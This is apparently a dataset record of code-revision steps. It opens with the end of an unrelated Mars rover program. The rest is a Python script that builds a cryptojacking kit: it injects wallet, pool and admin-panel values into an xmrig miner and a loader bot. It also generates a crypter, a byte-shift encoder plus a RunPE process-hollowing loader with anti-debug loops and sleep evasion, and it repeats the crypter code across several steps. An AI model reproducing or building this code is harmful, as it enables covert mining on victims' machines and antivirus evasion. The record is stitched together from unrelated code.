'''\n pass\n else:\n self.x += x\n self.y += y\n\n def set_commands(self, command_string):\n self.commands = command_string\n\n def execute(self):\n for c in self.commands:\n if c == 'L':\n self.rotate_left()\n elif c == 'R':\n self.rotate_right()\n elif c == 'M':\n self.move()\n else:\n print 'unknown command: %s' % c\n\n return \"%d %d %s\" % (self.x, self.y, self.o)\n\n\nclass ControlCenter(object):\n\n def __init__(self):\n self.input = ''\n self.rovers = []\n\n def set_input(self, text):\n ''' take the input, split by newline and discard empty lines '''\n self.input = [line for line in text.split('\\n') if line]\n\n def clear_rovers(self):\n self.rovers = []\n\n def initialize_rover(self, initial_position, plateau_dimensions):\n rover = Rover(initial_position, plateau_dimensions)\n '''\n Initialize a rover and add it to a list of rovers for reference.\n '''\n self.rovers.append(rover)\n return rover\n\n def run(self):\n rover_states = []\n\n ''' First setup the rovers, and collect the control statements '''\n for i, line in enumerate(self.input):\n line = line.upper()\n\n if i == 0:\n plateau_dimensions = line.split(\" \")\n elif (i % 2) == 1:\n rover = self.initialize_rover(line, plateau_dimensions)\n else:\n rover.set_commands(line)\n\n ''' \n Now that we have all the rovers initialized, we can pass their current\n positions to the one that's going to move in order to avoid collisions.\n '''\n for i, rover in enumerate(self.rovers):\n obstacles = [r.get_position()\n for r in self.rovers[:i] + self.rovers[i + 1:]]\n rover.set_obstacles(obstacles)\n state = rover.execute()\n rover_states.append(state)\n\n return \"\\n\\n\".join(rover_states)\n\n\nif __name__ == \"__main__\":\n from test_cases import tests\n success = 0\n cc = ControlCenter()\n for i, (test_input, test_output) in enumerate(tests, start=1):\n cc.clear_rovers()\n cc.set_input(test_input)\n\n if cc.run() == test_output:\n success += 1\n\n print '%d tests out of %d passed' % (success, i)\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
import os, sys, time, random, subprocess
def load_userdata(wallet, pool, ww, logger, adminka):
with open("D:\\msys64\\xmrig-master\\src\\ex.cpp", "r") as f:
file = f.read()
file = file.replace("%u%", wallet)
file = file.replace("%p%", pool)
file = file.replace("%w%", ww)
with open("D:\\msys64\\xmrig-master\\src\\xmrig.cpp", "w") as w:
w.write(file)
with open(os.getcwd()+"\\Bot\\Miner\\ex.cs", "r") as f:
file = f.read()
file = file.replace("%l%", logger)
file = file.replace("%a%", adminka)
with open(os.getcwd()+"\\Bot\\Miner\\Program.cs", "w") as w:
w.write(file)
def writeBytes(key):
with open(os.getcwd()+"\\file.txt", "r") as f:
file = f.read()
with open(os.getcwd()+"\\Miner\\CryptRunPe\\winhost.cpp", "w") as w:
w.write("#include <stdafx.h>\n#include \"process.h\"\n #include \"memrun.h\"\nusing namespace std;\n")
with open("ex.txt") as ex:
w.write(file)
exx = ex.read()
w.write(exx)
def compile(path, file):
os.system("%windir%\Microsoft.NET\Framework\\v4.0.30319\msbuild.exe \""+path+file+".sln\" /p:Configuration=Release")
def compileM(path, file):
os.system("msbuild.exe \""+path+file+".sln\" /p:Configuration=Release")
def compileR(path, file):
os.system("msbuild.exe \""+path+file+".sln\" /p:Configuration=Release /p:Platform=\"WIN32\"")
def xcopy(path, out):
try:
with open(path, "rb") as f:
file = f.read()
with open(out, "wb") as w:
w.write(bytearray(file))
except:
pass
def crypt(name, key):
with open('encoder.cpp', 'w') as w:
txt = '\n\
#include <Windows.h>\n\
#include <winternl.h>\n\
#include <iostream>\n\
#include <string>\n\
#include <fstream>\n\
using namespace std;\n\
int main()\n\
{\n\
FILE * file = fopen("in.exe", "rb");\n\
if (file == NULL) return 0;\n\
fseek(file, 0, SEEK_END);\n\
long int size = ftell(file);\n\
fclose(file);\n\
file = fopen("in.exe", "rb");\n\
unsigned char * in = (unsigned char *)malloc(size);\n\
int bytes_read = fread(in, sizeof(unsigned char), size, file);\n\
fclose(file);\n\
for (int i = 0; i < size; i++) {\n\
in[i] = in[i] - 0x0%n%;\n\
}\n\
file = fopen("out.exe", "wb");\n\
int bytes_written = fwrite(in, sizeof(unsigned char), size, file);\n\
fclose(file);\n\
for (int i = 0; i < size; i++) {\n\
in[i] = in[i] + 0x0%n%;\n\
}\n\
file = fopen("decr.exe", "wb");\n\
bytes_written = fwrite(in, sizeof(unsigned char), size, file);\n\
fclose(file);\n\
return 0;\n\
}\n\
'
txt = txt.replace("%n%", str(key))
w.write(txt)
os.system("g++ -o enc encoder.cpp")
os.system("C:\Python27\python.exe cv.py")
with open('file.txt', 'r') as r:
with open(os.getcwd()+"\\src\\crypter\\crypter.cpp", "w") as w:
txt = '\
#include "stdafx.h"\n\
#include "Crypter.h"\n\
#include <windows.h>\n\
#include <winternl.h>\n\
#pragma comment(lib,"ws2_32.lib")\n\
#pragma comment(lib,"ntdll.lib")\n\
'+ r.read() + '\
int RunPortableExecutable(void* Image) {\n\
IMAGE_DOS_HEADER* DOSHeader;\n\
IMAGE_NT_HEADERS* NtHeader;\n\
IMAGE_SECTION_HEADER* SectionHeader;\n\
PROCESS_INFORMATION PI;\n\
STARTUPINFOA SI;\n\
CONTEXT* CTX;\n\
DWORD* ImageBase;\n\
void* pImageBase;\n\
int count;\n\
char buffer[MAX_PATH];\n\
GetModuleFileNameA(NULL, (LPSTR)buffer, MAX_PATH);\n\
char *CurrentFilePath = buffer;\n\
DOSHeader = PIMAGE_DOS_HEADER(Image);\n\
NtHeader = PIMAGE_NT_HEADERS(DWORD(Image) + DOSHeader->e_lfanew);\n\
if (NtHeader->Signature == IMAGE_NT_SIGNATURE) {\n\
ZeroMemory(&PI, sizeof(PI));\n\
ZeroMemory(&SI, sizeof(SI));\n\
typedef LONG(WINAPI * NtUnmapViewOfSection)(HANDLE ProcessHandle, PVOID BaseAddress);\n\
NtUnmapViewOfSection mNtUnmapViewOfSection;\n\
if (CreateProcessA(CurrentFilePath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED | CREATE_NO_WINDOW, NULL, NULL, &SI, &PI)) {\n\
CTX = PCONTEXT(VirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE));\n\
CTX->ContextFlags = CONTEXT_FULL;\n\
if (GetThreadContext(PI.hThread, LPCONTEXT(CTX))) {\n\
ReadProcessMemory(PI.hProcess, LPCVOID(CTX->Ebx + 8), LPVOID(&ImageBase), 4, 0);\n\
pImageBase = VirtualAllocEx(PI.hProcess, LPVOID(NtHeader->OptionalHeader.ImageBase),\n\
NtHeader->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE);\n\
WriteProcessMemory(PI.hProcess, pImageBase, Image, NtHeader->OptionalHeader.SizeOfHeaders, NULL);\n\
for (count = 0; count < NtHeader->FileHeader.NumberOfSections; count++) {\n\
SectionHeader = PIMAGE_SECTION_HEADER(DWORD(Image) + DOSHeader->e_lfanew + 248 + (count * 40));\n\
WriteProcessMemory(PI.hProcess, LPVOID(DWORD(pImageBase) + SectionHeader->VirtualAddress),\n\
LPVOID(DWORD(Image) + SectionHeader->PointerToRawData), SectionHeader->SizeOfRawData, 0);\n\
}\n\
WriteProcessMemory(PI.hProcess, LPVOID(CTX->Ebx + 8), LPVOID(&NtHeader->OptionalHeader.ImageBase), 4, 0);\n\
CTX->Eax = DWORD(pImageBase) + NtHeader->OptionalHeader.AddressOfEntryPoint;\n\
SetThreadContext(PI.hThread, LPCONTEXT(CTX));\n\
ResumeThread(PI.hThread);\n\
return 0;\n\
}\n\
}\n\
}\n\
}\n\
int APIENTRY _tWinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPTSTR lpCmdLine, int nCmdShow) {\n\
for (int i = 0; i < 550000; i++)\n\
OutputDebugStringW(L"");\n\
for (int i = 0; i < sizeof(rawData) / sizeof(*rawData); i++) {\n\
unsigned char b = rawData[i] + 0x0%n%;\n\
rawData[i] = b;\n\
}\n\
Sleep(((rand() % 5 + 1) + 5) * 1000);\n\
RunPortableExecutable(rawData);\n\
return 0;\n\
}\
'
txt = txt.replace("%n%", str(key))
w.write(txt)
compileM(os.getcwd()+"\\src\\", "ConsoleApplication1")
xcopy(os.getcwd() + "\\src\\Release\\Crypter.exe", os.getcwd()+"\\"+name+".exe")
key = random.randint(1, 100)
u = sys.argv[1]
w = sys.argv[2]
p = sys.argv[3]
l = sys.argv[4]
a = sys.argv[5]
load_userdata(u, p, w, l, a)
compile(os.getcwd()+"\\Bot\\", "LoaderBot")
xcopy(os.getcwd()+"\\Bot\\Miner\\bin\\Release\\LoaderBot.exe", "Bot.exe")
compileR(os.getcwd()+"\\rig\\", "xmrig")
xcopy(os.getcwd()+"\\rig\\Release\\xmrig.exe", "out.exe")
crypt("test", key)
os.system("C:\Python27\python.exe cv.py")
writeBytes(key)
compileM(os.getcwd()+"\\Miner\\", "winhost")
xcopy(os.getcwd()+"\\Miner\\Release\\winhost.exe", "in.exe")
print(os.getcwd()+"\\enc.exe")
subprocess.call(os.getcwd()+"\\enc.exe")
crypt("winhost", key)
os.system("del file.txt")
os.system("del in.exe")
os.system("del out.exe")
os.system("del decr.exe")
os.system("del enc.exe")
os.system("del test.exe")
|
normal
|
{
"blob_id": "d1254e558217cce88de2f83b87d5c54333f1c677",
"index": 9938,
"step-1": "<mask token>\n\n\ndef load_userdata(wallet, pool, ww, logger, adminka):\n with open('D:\\\\msys64\\\\xmrig-master\\\\src\\\\ex.cpp', 'r') as f:\n file = f.read()\n file = file.replace('%u%', wallet)\n file = file.replace('%p%', pool)\n file = file.replace('%w%', ww)\n with open('D:\\\\msys64\\\\xmrig-master\\\\src\\\\xmrig.cpp', 'w') as w:\n w.write(file)\n with open(os.getcwd() + '\\\\Bot\\\\Miner\\\\ex.cs', 'r') as f:\n file = f.read()\n file = file.replace('%l%', logger)\n file = file.replace('%a%', adminka)\n with open(os.getcwd() + '\\\\Bot\\\\Miner\\\\Program.cs', 'w') as w:\n w.write(file)\n\n\ndef writeBytes(key):\n with open(os.getcwd() + '\\\\file.txt', 'r') as f:\n file = f.read()\n with open(os.getcwd() + '\\\\Miner\\\\CryptRunPe\\\\winhost.cpp', 'w') as w:\n w.write(\n \"\"\"#include <stdafx.h>\n#include \"process.h\"\n #include \"memrun.h\"\nusing namespace std;\n\"\"\"\n )\n with open('ex.txt') as ex:\n w.write(file)\n exx = ex.read()\n w.write(exx)\n\n\ndef compile(path, file):\n os.system(\n '%windir%\\\\Microsoft.NET\\\\Framework\\\\v4.0.30319\\\\msbuild.exe \"' +\n path + file + '.sln\" /p:Configuration=Release')\n\n\ndef compileM(path, file):\n os.system('msbuild.exe \"' + path + file + '.sln\" /p:Configuration=Release')\n\n\ndef compileR(path, file):\n os.system('msbuild.exe \"' + path + file +\n '.sln\" /p:Configuration=Release /p:Platform=\"WIN32\"')\n\n\ndef xcopy(path, out):\n try:\n with open(path, 'rb') as f:\n file = f.read()\n with open(out, 'wb') as w:\n w.write(bytearray(file))\n except:\n pass\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef load_userdata(wallet, pool, ww, logger, adminka):\n with open('D:\\\\msys64\\\\xmrig-master\\\\src\\\\ex.cpp', 'r') as f:\n file = f.read()\n file = file.replace('%u%', wallet)\n file = file.replace('%p%', pool)\n file = file.replace('%w%', ww)\n with open('D:\\\\msys64\\\\xmrig-master\\\\src\\\\xmrig.cpp', 'w') as w:\n w.write(file)\n with open(os.getcwd() + '\\\\Bot\\\\Miner\\\\ex.cs', 'r') as f:\n file = f.read()\n file = file.replace('%l%', logger)\n file = file.replace('%a%', adminka)\n with open(os.getcwd() + '\\\\Bot\\\\Miner\\\\Program.cs', 'w') as w:\n w.write(file)\n\n\ndef writeBytes(key):\n with open(os.getcwd() + '\\\\file.txt', 'r') as f:\n file = f.read()\n with open(os.getcwd() + '\\\\Miner\\\\CryptRunPe\\\\winhost.cpp', 'w') as w:\n w.write(\n \"\"\"#include <stdafx.h>\n#include \"process.h\"\n #include \"memrun.h\"\nusing namespace std;\n\"\"\"\n )\n with open('ex.txt') as ex:\n w.write(file)\n exx = ex.read()\n w.write(exx)\n\n\ndef compile(path, file):\n os.system(\n '%windir%\\\\Microsoft.NET\\\\Framework\\\\v4.0.30319\\\\msbuild.exe \"' +\n path + file + '.sln\" /p:Configuration=Release')\n\n\ndef compileM(path, file):\n os.system('msbuild.exe \"' + path + file + '.sln\" /p:Configuration=Release')\n\n\ndef compileR(path, file):\n os.system('msbuild.exe \"' + path + file +\n '.sln\" /p:Configuration=Release /p:Platform=\"WIN32\"')\n\n\ndef xcopy(path, out):\n try:\n with open(path, 'rb') as f:\n file = f.read()\n with open(out, 'wb') as w:\n w.write(bytearray(file))\n except:\n pass\n\n\ndef crypt(name, key):\n with open('encoder.cpp', 'w') as w:\n txt = \"\"\"\n #include <Windows.h>\n #include <winternl.h>\n #include <iostream>\n #include <string>\n #include <fstream>\n using namespace std;\n int main()\n {\n FILE * file = fopen(\"in.exe\", \"rb\");\n if (file == NULL) return 0;\n fseek(file, 0, SEEK_END);\n long int size = ftell(file);\n fclose(file);\n file = fopen(\"in.exe\", \"rb\");\n unsigned char * in = 
(unsigned char *)malloc(size);\n int bytes_read = fread(in, sizeof(unsigned char), size, file);\n fclose(file);\n for (int i = 0; i < size; i++) {\n in[i] = in[i] - 0x0%n%;\n }\n file = fopen(\"out.exe\", \"wb\");\n int bytes_written = fwrite(in, sizeof(unsigned char), size, file);\n fclose(file);\n for (int i = 0; i < size; i++) {\n in[i] = in[i] + 0x0%n%;\n }\n file = fopen(\"decr.exe\", \"wb\");\n bytes_written = fwrite(in, sizeof(unsigned char), size, file);\n fclose(file);\n return 0;\n }\n \"\"\"\n txt = txt.replace('%n%', str(key))\n w.write(txt)\n os.system('g++ -o enc encoder.cpp')\n os.system('C:\\\\Python27\\\\python.exe cv.py')\n with open('file.txt', 'r') as r:\n with open(os.getcwd() + '\\\\src\\\\crypter\\\\crypter.cpp', 'w') as w:\n txt = \"\"\" #include \"stdafx.h\"\n #include \"Crypter.h\"\n #include <windows.h>\n #include <winternl.h>\n #pragma comment(lib,\"ws2_32.lib\")\n #pragma comment(lib,\"ntdll.lib\")\n \"\"\" + r.read() + \"\"\" int RunPortableExecutable(void* Image) {\n IMAGE_DOS_HEADER* DOSHeader;\n IMAGE_NT_HEADERS* NtHeader;\n IMAGE_SECTION_HEADER* SectionHeader;\n PROCESS_INFORMATION PI;\n STARTUPINFOA SI;\n CONTEXT* CTX;\n DWORD* ImageBase;\n void* pImageBase;\n int count;\n char buffer[MAX_PATH];\n GetModuleFileNameA(NULL, (LPSTR)buffer, MAX_PATH);\n char *CurrentFilePath = buffer;\n DOSHeader = PIMAGE_DOS_HEADER(Image);\n NtHeader = PIMAGE_NT_HEADERS(DWORD(Image) + DOSHeader->e_lfanew);\n if (NtHeader->Signature == IMAGE_NT_SIGNATURE) {\n ZeroMemory(&PI, sizeof(PI));\n ZeroMemory(&SI, sizeof(SI));\n typedef LONG(WINAPI * NtUnmapViewOfSection)(HANDLE ProcessHandle, PVOID BaseAddress);\n NtUnmapViewOfSection mNtUnmapViewOfSection;\n if (CreateProcessA(CurrentFilePath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED | CREATE_NO_WINDOW, NULL, NULL, &SI, &PI)) {\n CTX = PCONTEXT(VirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE));\n CTX->ContextFlags = CONTEXT_FULL;\n if (GetThreadContext(PI.hThread, LPCONTEXT(CTX))) {\n 
ReadProcessMemory(PI.hProcess, LPCVOID(CTX->Ebx + 8), LPVOID(&ImageBase), 4, 0);\n pImageBase = VirtualAllocEx(PI.hProcess, LPVOID(NtHeader->OptionalHeader.ImageBase),\n NtHeader->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE);\n WriteProcessMemory(PI.hProcess, pImageBase, Image, NtHeader->OptionalHeader.SizeOfHeaders, NULL);\n for (count = 0; count < NtHeader->FileHeader.NumberOfSections; count++) {\n SectionHeader = PIMAGE_SECTION_HEADER(DWORD(Image) + DOSHeader->e_lfanew + 248 + (count * 40));\n WriteProcessMemory(PI.hProcess, LPVOID(DWORD(pImageBase) + SectionHeader->VirtualAddress),\n LPVOID(DWORD(Image) + SectionHeader->PointerToRawData), SectionHeader->SizeOfRawData, 0);\n }\n WriteProcessMemory(PI.hProcess, LPVOID(CTX->Ebx + 8), LPVOID(&NtHeader->OptionalHeader.ImageBase), 4, 0);\n CTX->Eax = DWORD(pImageBase) + NtHeader->OptionalHeader.AddressOfEntryPoint;\n SetThreadContext(PI.hThread, LPCONTEXT(CTX));\n ResumeThread(PI.hThread);\n return 0;\n }\n }\n }\n }\n int APIENTRY _tWinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPTSTR lpCmdLine, int nCmdShow) {\n for (int i = 0; i < 550000; i++)\n OutputDebugStringW(L\"\");\n for (int i = 0; i < sizeof(rawData) / sizeof(*rawData); i++) {\n unsigned char b = rawData[i] + 0x0%n%;\n rawData[i] = b;\n }\n Sleep(((rand() % 5 + 1) + 5) * 1000);\n RunPortableExecutable(rawData);\n return 0;\n } \"\"\"\n txt = txt.replace('%n%', str(key))\n w.write(txt)\n compileM(os.getcwd() + '\\\\src\\\\', 'ConsoleApplication1')\n xcopy(os.getcwd() + '\\\\src\\\\Release\\\\Crypter.exe', os.getcwd() +\n '\\\\' + name + '.exe')\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef load_userdata(wallet, pool, ww, logger, adminka):\n with open('D:\\\\msys64\\\\xmrig-master\\\\src\\\\ex.cpp', 'r') as f:\n file = f.read()\n file = file.replace('%u%', wallet)\n file = file.replace('%p%', pool)\n file = file.replace('%w%', ww)\n with open('D:\\\\msys64\\\\xmrig-master\\\\src\\\\xmrig.cpp', 'w') as w:\n w.write(file)\n with open(os.getcwd() + '\\\\Bot\\\\Miner\\\\ex.cs', 'r') as f:\n file = f.read()\n file = file.replace('%l%', logger)\n file = file.replace('%a%', adminka)\n with open(os.getcwd() + '\\\\Bot\\\\Miner\\\\Program.cs', 'w') as w:\n w.write(file)\n\n\ndef writeBytes(key):\n with open(os.getcwd() + '\\\\file.txt', 'r') as f:\n file = f.read()\n with open(os.getcwd() + '\\\\Miner\\\\CryptRunPe\\\\winhost.cpp', 'w') as w:\n w.write(\n \"\"\"#include <stdafx.h>\n#include \"process.h\"\n #include \"memrun.h\"\nusing namespace std;\n\"\"\"\n )\n with open('ex.txt') as ex:\n w.write(file)\n exx = ex.read()\n w.write(exx)\n\n\ndef compile(path, file):\n os.system(\n '%windir%\\\\Microsoft.NET\\\\Framework\\\\v4.0.30319\\\\msbuild.exe \"' +\n path + file + '.sln\" /p:Configuration=Release')\n\n\ndef compileM(path, file):\n os.system('msbuild.exe \"' + path + file + '.sln\" /p:Configuration=Release')\n\n\ndef compileR(path, file):\n os.system('msbuild.exe \"' + path + file +\n '.sln\" /p:Configuration=Release /p:Platform=\"WIN32\"')\n\n\ndef xcopy(path, out):\n try:\n with open(path, 'rb') as f:\n file = f.read()\n with open(out, 'wb') as w:\n w.write(bytearray(file))\n except:\n pass\n\n\ndef crypt(name, key):\n with open('encoder.cpp', 'w') as w:\n txt = \"\"\"\n #include <Windows.h>\n #include <winternl.h>\n #include <iostream>\n #include <string>\n #include <fstream>\n using namespace std;\n int main()\n {\n FILE * file = fopen(\"in.exe\", \"rb\");\n if (file == NULL) return 0;\n fseek(file, 0, SEEK_END);\n long int size = ftell(file);\n fclose(file);\n file = fopen(\"in.exe\", \"rb\");\n unsigned char * in = 
(unsigned char *)malloc(size);\n int bytes_read = fread(in, sizeof(unsigned char), size, file);\n fclose(file);\n for (int i = 0; i < size; i++) {\n in[i] = in[i] - 0x0%n%;\n }\n file = fopen(\"out.exe\", \"wb\");\n int bytes_written = fwrite(in, sizeof(unsigned char), size, file);\n fclose(file);\n for (int i = 0; i < size; i++) {\n in[i] = in[i] + 0x0%n%;\n }\n file = fopen(\"decr.exe\", \"wb\");\n bytes_written = fwrite(in, sizeof(unsigned char), size, file);\n fclose(file);\n return 0;\n }\n \"\"\"\n txt = txt.replace('%n%', str(key))\n w.write(txt)\n os.system('g++ -o enc encoder.cpp')\n os.system('C:\\\\Python27\\\\python.exe cv.py')\n with open('file.txt', 'r') as r:\n with open(os.getcwd() + '\\\\src\\\\crypter\\\\crypter.cpp', 'w') as w:\n txt = \"\"\" #include \"stdafx.h\"\n #include \"Crypter.h\"\n #include <windows.h>\n #include <winternl.h>\n #pragma comment(lib,\"ws2_32.lib\")\n #pragma comment(lib,\"ntdll.lib\")\n \"\"\" + r.read() + \"\"\" int RunPortableExecutable(void* Image) {\n IMAGE_DOS_HEADER* DOSHeader;\n IMAGE_NT_HEADERS* NtHeader;\n IMAGE_SECTION_HEADER* SectionHeader;\n PROCESS_INFORMATION PI;\n STARTUPINFOA SI;\n CONTEXT* CTX;\n DWORD* ImageBase;\n void* pImageBase;\n int count;\n char buffer[MAX_PATH];\n GetModuleFileNameA(NULL, (LPSTR)buffer, MAX_PATH);\n char *CurrentFilePath = buffer;\n DOSHeader = PIMAGE_DOS_HEADER(Image);\n NtHeader = PIMAGE_NT_HEADERS(DWORD(Image) + DOSHeader->e_lfanew);\n if (NtHeader->Signature == IMAGE_NT_SIGNATURE) {\n ZeroMemory(&PI, sizeof(PI));\n ZeroMemory(&SI, sizeof(SI));\n typedef LONG(WINAPI * NtUnmapViewOfSection)(HANDLE ProcessHandle, PVOID BaseAddress);\n NtUnmapViewOfSection mNtUnmapViewOfSection;\n if (CreateProcessA(CurrentFilePath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED | CREATE_NO_WINDOW, NULL, NULL, &SI, &PI)) {\n CTX = PCONTEXT(VirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE));\n CTX->ContextFlags = CONTEXT_FULL;\n if (GetThreadContext(PI.hThread, LPCONTEXT(CTX))) {\n 
ReadProcessMemory(PI.hProcess, LPCVOID(CTX->Ebx + 8), LPVOID(&ImageBase), 4, 0);\n pImageBase = VirtualAllocEx(PI.hProcess, LPVOID(NtHeader->OptionalHeader.ImageBase),\n NtHeader->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE);\n WriteProcessMemory(PI.hProcess, pImageBase, Image, NtHeader->OptionalHeader.SizeOfHeaders, NULL);\n for (count = 0; count < NtHeader->FileHeader.NumberOfSections; count++) {\n SectionHeader = PIMAGE_SECTION_HEADER(DWORD(Image) + DOSHeader->e_lfanew + 248 + (count * 40));\n WriteProcessMemory(PI.hProcess, LPVOID(DWORD(pImageBase) + SectionHeader->VirtualAddress),\n LPVOID(DWORD(Image) + SectionHeader->PointerToRawData), SectionHeader->SizeOfRawData, 0);\n }\n WriteProcessMemory(PI.hProcess, LPVOID(CTX->Ebx + 8), LPVOID(&NtHeader->OptionalHeader.ImageBase), 4, 0);\n CTX->Eax = DWORD(pImageBase) + NtHeader->OptionalHeader.AddressOfEntryPoint;\n SetThreadContext(PI.hThread, LPCONTEXT(CTX));\n ResumeThread(PI.hThread);\n return 0;\n }\n }\n }\n }\n int APIENTRY _tWinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPTSTR lpCmdLine, int nCmdShow) {\n for (int i = 0; i < 550000; i++)\n OutputDebugStringW(L\"\");\n for (int i = 0; i < sizeof(rawData) / sizeof(*rawData); i++) {\n unsigned char b = rawData[i] + 0x0%n%;\n rawData[i] = b;\n }\n Sleep(((rand() % 5 + 1) + 5) * 1000);\n RunPortableExecutable(rawData);\n return 0;\n } \"\"\"\n txt = txt.replace('%n%', str(key))\n w.write(txt)\n compileM(os.getcwd() + '\\\\src\\\\', 'ConsoleApplication1')\n xcopy(os.getcwd() + '\\\\src\\\\Release\\\\Crypter.exe', os.getcwd() +\n '\\\\' + name + '.exe')\n\n\n<mask token>\nload_userdata(u, p, w, l, a)\ncompile(os.getcwd() + '\\\\Bot\\\\', 'LoaderBot')\nxcopy(os.getcwd() + '\\\\Bot\\\\Miner\\\\bin\\\\Release\\\\LoaderBot.exe', 'Bot.exe')\ncompileR(os.getcwd() + '\\\\rig\\\\', 'xmrig')\nxcopy(os.getcwd() + '\\\\rig\\\\Release\\\\xmrig.exe', 'out.exe')\ncrypt('test', key)\nos.system('C:\\\\Python27\\\\python.exe 
cv.py')\nwriteBytes(key)\ncompileM(os.getcwd() + '\\\\Miner\\\\', 'winhost')\nxcopy(os.getcwd() + '\\\\Miner\\\\Release\\\\winhost.exe', 'in.exe')\nprint(os.getcwd() + '\\\\enc.exe')\nsubprocess.call(os.getcwd() + '\\\\enc.exe')\ncrypt('winhost', key)\nos.system('del file.txt')\nos.system('del in.exe')\nos.system('del out.exe')\nos.system('del decr.exe')\nos.system('del enc.exe')\nos.system('del test.exe')\n",
"step-4": "<mask token>\n\n\ndef load_userdata(wallet, pool, ww, logger, adminka):\n with open('D:\\\\msys64\\\\xmrig-master\\\\src\\\\ex.cpp', 'r') as f:\n file = f.read()\n file = file.replace('%u%', wallet)\n file = file.replace('%p%', pool)\n file = file.replace('%w%', ww)\n with open('D:\\\\msys64\\\\xmrig-master\\\\src\\\\xmrig.cpp', 'w') as w:\n w.write(file)\n with open(os.getcwd() + '\\\\Bot\\\\Miner\\\\ex.cs', 'r') as f:\n file = f.read()\n file = file.replace('%l%', logger)\n file = file.replace('%a%', adminka)\n with open(os.getcwd() + '\\\\Bot\\\\Miner\\\\Program.cs', 'w') as w:\n w.write(file)\n\n\ndef writeBytes(key):\n with open(os.getcwd() + '\\\\file.txt', 'r') as f:\n file = f.read()\n with open(os.getcwd() + '\\\\Miner\\\\CryptRunPe\\\\winhost.cpp', 'w') as w:\n w.write(\n \"\"\"#include <stdafx.h>\n#include \"process.h\"\n #include \"memrun.h\"\nusing namespace std;\n\"\"\"\n )\n with open('ex.txt') as ex:\n w.write(file)\n exx = ex.read()\n w.write(exx)\n\n\ndef compile(path, file):\n os.system(\n '%windir%\\\\Microsoft.NET\\\\Framework\\\\v4.0.30319\\\\msbuild.exe \"' +\n path + file + '.sln\" /p:Configuration=Release')\n\n\ndef compileM(path, file):\n os.system('msbuild.exe \"' + path + file + '.sln\" /p:Configuration=Release')\n\n\ndef compileR(path, file):\n os.system('msbuild.exe \"' + path + file +\n '.sln\" /p:Configuration=Release /p:Platform=\"WIN32\"')\n\n\ndef xcopy(path, out):\n try:\n with open(path, 'rb') as f:\n file = f.read()\n with open(out, 'wb') as w:\n w.write(bytearray(file))\n except:\n pass\n\n\ndef crypt(name, key):\n with open('encoder.cpp', 'w') as w:\n txt = \"\"\"\n #include <Windows.h>\n #include <winternl.h>\n #include <iostream>\n #include <string>\n #include <fstream>\n using namespace std;\n int main()\n {\n FILE * file = fopen(\"in.exe\", \"rb\");\n if (file == NULL) return 0;\n fseek(file, 0, SEEK_END);\n long int size = ftell(file);\n fclose(file);\n file = fopen(\"in.exe\", \"rb\");\n unsigned char * in = 
(unsigned char *)malloc(size);\n int bytes_read = fread(in, sizeof(unsigned char), size, file);\n fclose(file);\n for (int i = 0; i < size; i++) {\n in[i] = in[i] - 0x0%n%;\n }\n file = fopen(\"out.exe\", \"wb\");\n int bytes_written = fwrite(in, sizeof(unsigned char), size, file);\n fclose(file);\n for (int i = 0; i < size; i++) {\n in[i] = in[i] + 0x0%n%;\n }\n file = fopen(\"decr.exe\", \"wb\");\n bytes_written = fwrite(in, sizeof(unsigned char), size, file);\n fclose(file);\n return 0;\n }\n \"\"\"\n txt = txt.replace('%n%', str(key))\n w.write(txt)\n os.system('g++ -o enc encoder.cpp')\n os.system('C:\\\\Python27\\\\python.exe cv.py')\n with open('file.txt', 'r') as r:\n with open(os.getcwd() + '\\\\src\\\\crypter\\\\crypter.cpp', 'w') as w:\n txt = \"\"\" #include \"stdafx.h\"\n #include \"Crypter.h\"\n #include <windows.h>\n #include <winternl.h>\n #pragma comment(lib,\"ws2_32.lib\")\n #pragma comment(lib,\"ntdll.lib\")\n \"\"\" + r.read() + \"\"\" int RunPortableExecutable(void* Image) {\n IMAGE_DOS_HEADER* DOSHeader;\n IMAGE_NT_HEADERS* NtHeader;\n IMAGE_SECTION_HEADER* SectionHeader;\n PROCESS_INFORMATION PI;\n STARTUPINFOA SI;\n CONTEXT* CTX;\n DWORD* ImageBase;\n void* pImageBase;\n int count;\n char buffer[MAX_PATH];\n GetModuleFileNameA(NULL, (LPSTR)buffer, MAX_PATH);\n char *CurrentFilePath = buffer;\n DOSHeader = PIMAGE_DOS_HEADER(Image);\n NtHeader = PIMAGE_NT_HEADERS(DWORD(Image) + DOSHeader->e_lfanew);\n if (NtHeader->Signature == IMAGE_NT_SIGNATURE) {\n ZeroMemory(&PI, sizeof(PI));\n ZeroMemory(&SI, sizeof(SI));\n typedef LONG(WINAPI * NtUnmapViewOfSection)(HANDLE ProcessHandle, PVOID BaseAddress);\n NtUnmapViewOfSection mNtUnmapViewOfSection;\n if (CreateProcessA(CurrentFilePath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED | CREATE_NO_WINDOW, NULL, NULL, &SI, &PI)) {\n CTX = PCONTEXT(VirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE));\n CTX->ContextFlags = CONTEXT_FULL;\n if (GetThreadContext(PI.hThread, LPCONTEXT(CTX))) {\n 
